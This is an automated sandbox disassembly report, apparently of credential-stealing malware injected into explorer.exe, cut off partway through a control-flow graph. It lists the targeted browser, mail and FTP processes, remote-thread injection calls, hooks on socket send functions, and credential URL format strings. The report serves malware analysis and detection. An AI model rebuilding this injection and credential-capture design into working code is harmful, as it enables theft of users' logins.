                                    control_flow_graph 0 81016-81020 call 82608 3 81022-8104b call 82861 RtlMoveMemory 0->3 4 81097-81098 0->4 7 8104d-8106b call 82861 RtlMoveMemory 3->7 8 81071-81090 NtUnmapViewOfSection GetCurrentProcessId 3->8 7->8 10 8109e-810d7 call 810a4 call 82861 8->10 11 81092-81093 8->11 21 810dc-810ea CreateToolhelp32Snapshot 10->21 11->4 12 81095-81099 call 81332 11->12 12->10 22 810f0-81106 Process32First 21->22 23 81322-8132d Sleep 21->23 24 8131b-8131c CloseHandle 22->24 25 8110c-8111e lstrcmpi 22->25 23->21 24->23 26 81280-81289 call 825ad 25->26 27 81124-81132 lstrcmpi 25->27 33 8128b-81294 call 82592 26->33 34 81305-81313 Process32Next 26->34 27->26 29 81138-81146 lstrcmpi 27->29 29->26 31 8114c-8115a lstrcmpi 29->31 31->26 32 81160-8116a lstrcmpi 31->32 32->26 35 81170-8117e lstrcmpi 32->35 33->34 41 81296-8129d call 82573 33->41 34->25 36 81319 34->36 35->26 38 81184-81192 lstrcmpi 35->38 36->24 38->26 40 81198-811a6 lstrcmpi 38->40 40->26 42 811ac-811ba lstrcmpi 40->42 41->34 47 8129f-812ac call 82608 41->47 42->26 44 811c0-811ce lstrcmpi 42->44 44->26 46 811d4-811e2 lstrcmpi 44->46 46->26 48 811e8-811f6 lstrcmpi 46->48 47->34 53 812ae-81300 lstrcmpi call 82731 call 81819 call 82731 47->53 48->26 50 811fc-8120a lstrcmpi 48->50 50->26 52 8120c-8121a lstrcmpi 50->52 52->26 54 8121c-8122a lstrcmpi 52->54 53->34 54->26 56 8122c-8123a lstrcmpi 54->56 56->26 58 8123c-8124a lstrcmpi 56->58 58->26 61 8124c-8125a lstrcmpi 58->61 61->26 63 8125c-8126a lstrcmpi 61->63 63->26 64 8126c-8127a lstrcmpi 63->64 64->26 64->34
                                    APIs
                                      • Part of subcall function 00082608: VirtualQuery.KERNEL32(00084434,?,0000001C), ref: 00082615
                                      • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                      • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                    • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00081038
                                    • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008106B
                                    • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081074
                                    • GetCurrentProcessId.KERNEL32(?,00081010), ref: 0008107A
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000810DF
                                    • Process32First.KERNEL32(00000000,?), ref: 000810FE
                                    • lstrcmpi.KERNEL32(?,firefox.exe), ref: 0008111A
                                    • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 0008112E
                                    • lstrcmpi.KERNEL32(?,chrome.exe), ref: 00081142
                                    • lstrcmpi.KERNEL32(?,opera.exe), ref: 00081156
                                    • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081166
                                    • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008117A
                                    • lstrcmpi.KERNEL32(?,thebat.exe), ref: 0008118E
                                    • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000811A2
                                    • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000811B6
                                    • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000811CA
                                    • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000811DE
                                    • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000811F2
                                    • lstrcmpi.KERNEL32(?,winscp.exe), ref: 00081206
                                    • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 00081216
                                    • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 00081226
                                    • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 00081236
                                    • lstrcmpi.KERNEL32(?,263em.exe), ref: 00081246
                                    • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 00081256
                                    • lstrcmpi.KERNEL32(?,alimail.exe), ref: 00081266
                                    • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 00081276
                                    • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000812B4
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 0008130B
                                    • CloseHandle.KERNELBASE(00000000), ref: 0008131C
                                    • Sleep.KERNELBASE(000003E8), ref: 00081327
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                    • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                    • API String ID: 2555639992-1680033604
                                    • Opcode ID: f6b0748ffe915788ddbf0a8172041e8907a756ad33ca29f8d35bd18e9fa523b2
                                    • Instruction ID: c6fb3a315111370b2d623b8f7e562b9d3a4c86b5ba4b7d63d824c8c2a37431fe
                                    • Opcode Fuzzy Hash: f6b0748ffe915788ddbf0a8172041e8907a756ad33ca29f8d35bd18e9fa523b2
                                    • Instruction Fuzzy Hash: F9719330604305ABDB50FBB19C49EAE7BECBF85B90B040529FAC1C7191EB75DA068B65

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 65 810a4-810d7 call 82861 68 810dc-810ea CreateToolhelp32Snapshot 65->68 69 810f0-81106 Process32First 68->69 70 81322-8132d Sleep 68->70 71 8131b-8131c CloseHandle 69->71 72 8110c-8111e lstrcmpi 69->72 70->68 71->70 73 81280-81289 call 825ad 72->73 74 81124-81132 lstrcmpi 72->74 80 8128b-81294 call 82592 73->80 81 81305-81313 Process32Next 73->81 74->73 76 81138-81146 lstrcmpi 74->76 76->73 78 8114c-8115a lstrcmpi 76->78 78->73 79 81160-8116a lstrcmpi 78->79 79->73 82 81170-8117e lstrcmpi 79->82 80->81 88 81296-8129d call 82573 80->88 81->72 83 81319 81->83 82->73 85 81184-81192 lstrcmpi 82->85 83->71 85->73 87 81198-811a6 lstrcmpi 85->87 87->73 89 811ac-811ba lstrcmpi 87->89 88->81 94 8129f-812ac call 82608 88->94 89->73 91 811c0-811ce lstrcmpi 89->91 91->73 93 811d4-811e2 lstrcmpi 91->93 93->73 95 811e8-811f6 lstrcmpi 93->95 94->81 100 812ae-81300 lstrcmpi call 82731 call 81819 call 82731 94->100 95->73 97 811fc-8120a lstrcmpi 95->97 97->73 99 8120c-8121a lstrcmpi 97->99 99->73 101 8121c-8122a lstrcmpi 99->101 100->81 101->73 103 8122c-8123a lstrcmpi 101->103 103->73 105 8123c-8124a lstrcmpi 103->105 105->73 108 8124c-8125a lstrcmpi 105->108 108->73 110 8125c-8126a lstrcmpi 108->110 110->73 111 8126c-8127a lstrcmpi 110->111 111->73 111->81
                                    APIs
                                      • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                      • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000810DF
                                    • Process32First.KERNEL32(00000000,?), ref: 000810FE
                                    • lstrcmpi.KERNEL32(?,firefox.exe), ref: 0008111A
                                    • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 0008112E
                                    • lstrcmpi.KERNEL32(?,chrome.exe), ref: 00081142
                                    • lstrcmpi.KERNEL32(?,opera.exe), ref: 00081156
                                    • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081166
                                    • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008117A
                                    • lstrcmpi.KERNEL32(?,thebat.exe), ref: 0008118E
                                    • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000811A2
                                    • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000811B6
                                    • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000811CA
                                    • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000811DE
                                    • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000811F2
                                    • lstrcmpi.KERNEL32(?,winscp.exe), ref: 00081206
                                    • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 00081216
                                    • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 00081226
                                    • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 00081236
                                    • lstrcmpi.KERNEL32(?,263em.exe), ref: 00081246
                                    • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 00081256
                                    • lstrcmpi.KERNEL32(?,alimail.exe), ref: 00081266
                                    • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 00081276
                                    • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000812B4
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 0008130B
                                    • CloseHandle.KERNELBASE(00000000), ref: 0008131C
                                    • Sleep.KERNELBASE(000003E8), ref: 00081327
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                    • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                    • API String ID: 3950187957-1680033604
                                    • Opcode ID: cb2e06b24ee9ee07d08b4b53c66a340f2cdc8c2052ea491795e5298a327fee5c
                                    • Instruction ID: 92ea90e728a065c3b10ee3f836ed5eb5e8a8dda0ab9d7eab971388ade25db994
                                    • Opcode Fuzzy Hash: cb2e06b24ee9ee07d08b4b53c66a340f2cdc8c2052ea491795e5298a327fee5c
                                    • Instruction Fuzzy Hash: 79517270604305A7DB50FBB18C85EAF7AECBF85B90B040939FAC1D6081EB64DA068B75

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 112 87728-87745 113 8774b-87758 112->113 114 8790d 112->114 115 8776a-8776f 113->115 114->114 116 87771 115->116 117 87760-87765 116->117 118 87773 116->118 119 87766-87768 117->119 120 87778-8777a 118->120 119->115 119->116 121 8777c-87781 120->121 122 87783-87787 120->122 121->122 122->120 123 87789 122->123 124 8778b-87792 123->124 125 87794-87799 123->125 124->120 124->125 126 877a8-877aa 125->126 127 8779b-877a4 125->127 130 877ac-877b1 126->130 131 877b3-877b7 126->131 128 8781a-8781d 127->128 129 877a6 127->129 134 87822-87825 128->134 129->126 130->131 132 877b9-877be 131->132 133 877c0-877c2 131->133 132->133 136 877e4-877f3 133->136 137 877c4 133->137 135 87827-87829 134->135 135->134 138 8782b-8782e 135->138 140 87804-87811 136->140 141 877f5-877fc 136->141 139 877c5-877c7 137->139 138->134 142 87830-8784c 138->142 143 877c9-877ce 139->143 144 877d0-877d4 139->144 140->140 146 87813-87815 140->146 141->141 145 877fe 141->145 142->135 147 8784e 142->147 143->144 144->139 148 877d6 144->148 145->119 146->119 149 87854-87858 147->149 150 877d8-877df 148->150 151 877e1 148->151 152 8785a-87870 LoadLibraryA 149->152 153 8789f-878a2 149->153 150->139 150->151 151->136 154 87871-87876 152->154 155 878a5-878ac 153->155 154->149 156 87878-8787a 154->156 157 878ae-878b0 155->157 158 878d0-87900 VirtualProtect * 2 155->158 160 8787c-87882 156->160 161 87883-87890 GetProcAddress 156->161 162 878b2-878c1 157->162 163 878c3-878ce 157->163 159 87904-87908 158->159 159->159 164 8790a 159->164 160->161 165 87899-8789c 161->165 166 87892-87897 161->166 162->155 163->162 164->114 166->154
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.605262132.0000000000086000.00000040.80000000.00040000.00000000.sdmp, Offset: 00086000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_86000_explorer.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3c5445227933b7c7884a948d87e6e6edbd1f0b00d7431add8d286fe8315b697d
                                    • Instruction ID: 9b19febec4c14d8985e07823db6ea8ccfd6019d3ec10bd7ab69b27837b6b85f3
                                    • Opcode Fuzzy Hash: 3c5445227933b7c7884a948d87e6e6edbd1f0b00d7431add8d286fe8315b697d
                                    • Instruction Fuzzy Hash: FF512B7194C3918FD722AA78CC847B57BE0FB52320B390679C5E9CB3CAEB949805C761

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 167 82861-82871 GetProcessHeap RtlAllocateHeap
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcess
                                    • String ID:
                                    • API String ID: 1357844191-0
                                    • Opcode ID: dd8bd5360c9c98a9841e087fd6d4da07649c860a1a6323a56136c81b20943975
                                    • Instruction ID: 77588290d4e37ef700697110175aaff6c1c57f9cd16726c1ee75de6bd7924a5a
                                    • Opcode Fuzzy Hash: dd8bd5360c9c98a9841e087fd6d4da07649c860a1a6323a56136c81b20943975
                                    • Instruction Fuzzy Hash: 8CA002715502507FFD4557A4FD1DF557A19B7C5B11F0045447189C50609968554C9F21

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00082608: VirtualQuery.KERNEL32(00084434,?,0000001C), ref: 00082615
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,756F3E2E,microsoftedgecp.exe,?), ref: 0008184E
                                    • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00081889
                                    • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00081919
                                    • RtlMoveMemory.NTDLL(00000000,00083428,00000016), ref: 00081940
                                    • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00081968
                                    • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00081978
                                    • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00081992
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0008199A
                                    • CloseHandle.KERNEL32(00000000), ref: 000819A8
                                    • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000819AF
                                    • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 000819C5
                                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000819CC
                                    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000819E2
                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A0C
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081A1F
                                    • CloseHandle.KERNEL32(00000000), ref: 00081A26
                                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A2D
                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A41
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00081A58
                                    • CloseHandle.KERNEL32(00000000), ref: 00081A65
                                    • CloseHandle.KERNEL32(?), ref: 00081A6B
                                    • CloseHandle.KERNEL32(?), ref: 00081A71
                                    • CloseHandle.KERNEL32(00000000), ref: 00081A74
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                    • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                    • API String ID: 1066286714-4141090125
                                    • Opcode ID: b93d06834f6a1b31c03425c76c15e44102fa25189e47d0077c7e9fd67a3e8666
                                    • Instruction ID: 9f5633c6449d72ef76d13a6fe6a98af6d308b0c36e19ae64f2dd6a10d85f2928
                                    • Opcode Fuzzy Hash: b93d06834f6a1b31c03425c76c15e44102fa25189e47d0077c7e9fd67a3e8666
                                    • Instruction Fuzzy Hash: 47618E31105304AFE710EF65DC84EABBBECFF89B54F000519F989D6291DA74DA058B62

                                    Control-flow Graph

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0008265A
                                    • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00082672
                                    • lstrlen.KERNEL32(?,00000000), ref: 0008267A
                                    • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00082685
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0008269F
                                    • wsprintfA.USER32 ref: 000826B6
                                    • CryptDestroyHash.ADVAPI32(?), ref: 000826CF
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 000826D9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                    • String ID: %02X
                                    • API String ID: 3341110664-436463671
                                    • Opcode ID: fc706adbc229e9871d075a65bcf97a68664b66aeeab1e926bd154e23bee0acba
                                    • Instruction ID: 6f7decda94893415d9c613d86727ea4291130fd5527fc19c423d8df5fa7bf1f8
                                    • Opcode Fuzzy Hash: fc706adbc229e9871d075a65bcf97a68664b66aeeab1e926bd154e23bee0acba
                                    • Instruction Fuzzy Hash: D51128B1A00108BFEB119B95EC98EAEBFBCFB88B41F104065F645E2160D6758F119B60

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                      • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0008109E,?,00081010), ref: 0008134A
                                    • GetCurrentProcessId.KERNEL32(00000003,?,0008109E,?,00081010), ref: 0008135B
                                    • wsprintfA.USER32 ref: 00081372
                                      • Part of subcall function 0008263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0008265A
                                      • Part of subcall function 0008263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00082672
                                      • Part of subcall function 0008263E: lstrlen.KERNEL32(?,00000000), ref: 0008267A
                                      • Part of subcall function 0008263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00082685
                                      • Part of subcall function 0008263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0008269F
                                      • Part of subcall function 0008263E: wsprintfA.USER32 ref: 000826B6
                                      • Part of subcall function 0008263E: CryptDestroyHash.ADVAPI32(?), ref: 000826CF
                                      • Part of subcall function 0008263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 000826D9
                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00081389
                                    • GetLastError.KERNEL32 ref: 0008138F
                                    • Sleep.KERNEL32(000001F4), ref: 000813A1
                                      • Part of subcall function 000824D5: GetCurrentProcessId.KERNEL32 ref: 000824E7
                                      • Part of subcall function 000824D5: GetCurrentThreadId.KERNEL32 ref: 000824EF
                                      • Part of subcall function 000824D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000824FF
                                      • Part of subcall function 000824D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0008250D
                                      • Part of subcall function 000824D5: CloseHandle.KERNEL32(00000000), ref: 00082566
                                    • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 000813B8
                                    • GetProcAddress.KERNEL32(00000000), ref: 000813BF
                                    • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 000813E4
                                    • GetProcAddress.KERNEL32(00000000), ref: 000813EB
                                      • Part of subcall function 00081DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00081E1D
                                    • RtlExitUserThread.NTDLL(00000000), ref: 0008141D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                    • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                    • API String ID: 706757162-1430290102
                                    • Opcode ID: 4fec015cbb2ac13bf4a1c12d5512f26f0fe35a9b684991f6ddbd7004c2ccbf0f
                                    • Instruction ID: e1150cd2257c806cacc2476d6baa2bc67bd95f910a78fb5d1cafcba5e1534409
                                    • Opcode Fuzzy Hash: 4fec015cbb2ac13bf4a1c12d5512f26f0fe35a9b684991f6ddbd7004c2ccbf0f
                                    • Instruction Fuzzy Hash: 1D317531340615BBDF107FA0DC1ABDE3B59BF95F41F005014FAC69A292CF799A528BA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 235 81647-8165a 236 81748-8174f 235->236 237 81660-81662 235->237 237->236 238 81668-8166b 237->238 238->236 239 81671-8167d lstrlen 238->239 240 81683-8168a lstrlen 239->240 241 81747 239->241 240->241 242 81690-816a8 getpeername 240->242 241->236 242->241 243 816ae-816ca inet_ntoa htons 242->243 243->241 244 816cc-816d4 243->244 245 81708 244->245 246 816d6-816d9 244->246 249 8170d-8173c call 82861 wsprintfA call 824ae 245->249 247 816db-816de 246->247 248 816f3-816f8 246->248 250 816e0-816e3 247->250 251 81701-81706 247->251 248->249 249->241 259 8173e-81745 call 82843 249->259 254 816fa-816ff 250->254 255 816e5-816ea 250->255 251->249 254->249 255->248 257 816ec-816f1 255->257 257->241 257->248 259->241
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                    • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                    • API String ID: 3379139566-1703351401
                                    • Opcode ID: 03f0530a0a7ee1c63c3f1577a01795ef3f55d768128e7972553bc29af73dd61b
                                    • Instruction ID: d5608456101c3c778587acf2e152922007bce819ecc53712541b90b68493945c
                                    • Opcode Fuzzy Hash: 03f0530a0a7ee1c63c3f1577a01795ef3f55d768128e7972553bc29af73dd61b
                                    • Instruction Fuzzy Hash: 97219236E04209ABAF517EA9CD885FE7AFDBF85701F084179E9C4D3211DA34CE129B64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 267 81752-81774 GetModuleHandleA GetProcAddress 268 817c1-817c6 267->268 269 81776-817c0 RtlZeroMemory * 4 267->269 269->268
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00081539,?,?,?,0008144B,?), ref: 00081763
                                    • GetProcAddress.KERNEL32(00000000,?,00081539,?,?,?,0008144B,?), ref: 0008176A
                                    • RtlZeroMemory.NTDLL(00084228,00000104), ref: 00081788
                                    • RtlZeroMemory.NTDLL(00084118,00000104), ref: 00081790
                                    • RtlZeroMemory.NTDLL(00084330,00000104), ref: 00081798
                                    • RtlZeroMemory.NTDLL(00084000,00000104), ref: 000817A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MemoryZero$AddressHandleModuleProc
                                    • String ID: %s%s%s%s$ntdll.dll$sscanf
                                    • API String ID: 1490332519-278825019
                                    • Opcode ID: 0d8de067e37a3c8e510e18b4f3f54e50335b4ff64490c8f9c8ca228bf60caefa
                                    • Instruction ID: 530bc9f54433c06892bab1a68e75f7d045b8179b057df917c1f81b95164fa071
                                    • Opcode Fuzzy Hash: 0d8de067e37a3c8e510e18b4f3f54e50335b4ff64490c8f9c8ca228bf60caefa
                                    • Instruction Fuzzy Hash: 29F0823278032D33852032EABC0AD4BBE5CFBD1FA63420161B7C4AB281D8996A004BF4

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 271 824d5-82513 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 272 82561-82563 271->272 273 82515-82519 272->273 274 82565-82572 CloseHandle 272->274 275 8251b-8251f 273->275 276 82555-8255b Thread32Next 273->276 275->276 277 82521-8253a OpenThread 275->277 276->272 278 8253c-82542 SuspendThread 277->278 279 82544 ResumeThread 277->279 280 8254a-82551 CloseHandle 278->280 279->280 280->276
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 000824E7
                                    • GetCurrentThreadId.KERNEL32 ref: 000824EF
                                    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000824FF
                                    • Thread32First.KERNEL32(00000000,0000001C), ref: 0008250D
                                    • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0008252C
                                    • SuspendThread.KERNEL32(00000000), ref: 0008253C
                                    • CloseHandle.KERNEL32(00000000), ref: 0008254B
                                    • Thread32Next.KERNEL32(00000000,0000001C), ref: 0008255B
                                    • CloseHandle.KERNEL32(00000000), ref: 00082566
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                    • String ID:
                                    • API String ID: 1467098526-0
                                    • Opcode ID: 13e0c775c2527d4a5f09ea347ca2aaf5247988b557232a428c51b9325d28ed3b
                                    • Instruction ID: fb39f373af59805266f910fafb1a5732cded0f9030e1640caf296d2c8af7054c
                                    • Opcode Fuzzy Hash: 13e0c775c2527d4a5f09ea347ca2aaf5247988b557232a428c51b9325d28ed3b
                                    • Instruction Fuzzy Hash: B9118EB1044700EFE710AF60AC2CB6EBBA8FFC5B01F000529FAC192150D7399A498FA7

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 281 81f4a-81fa5 call 822b8 call 82861 call 827e2 call 82374 290 81fc0-81fcc 281->290 291 81fa7-81fbe 281->291 294 81fd0-81fd2 290->294 291->294 295 81fd8-8200f RtlZeroMemory 294->295 296 822a6-822b5 call 82843 294->296 300 8229e-822a5 295->300 301 82015-82030 295->301 300->296 302 82062-82074 301->302 303 82032-82043 call 822e5 301->303 308 82078-8207a 302->308 309 82045-82054 303->309 310 82056 303->310 312 8228b-82291 308->312 313 82080-820dc call 82731 308->313 311 82058-82060 309->311 310->311 311->308 314 8229a 312->314 315 82293-82295 call 82843 312->315 321 820e2-820e7 313->321 322 82284 313->322 314->300 315->314 323 820e9-820fa 321->323 324 82101-8212f call 82861 wsprintfW 321->324 322->312 323->324 327 82148-8215f 324->327 328 82131-82133 324->328 334 8219e-821b8 327->334 335 82161-82197 call 82861 wsprintfW 327->335 329 82134-82137 328->329 330 82139-8213e 329->330 331 82142-82144 329->331 330->329 333 82140 330->333 331->327 333->327 339 821be-821d1 334->339 340 82261-82277 call 82843 334->340 335->334 339->340 343 821d7-821ed call 82861 339->343 348 82279-8227b call 82843 340->348 349 82280 340->349 350 821ef-821fa 343->350 348->349 349->322 352 821fc-82209 call 82826 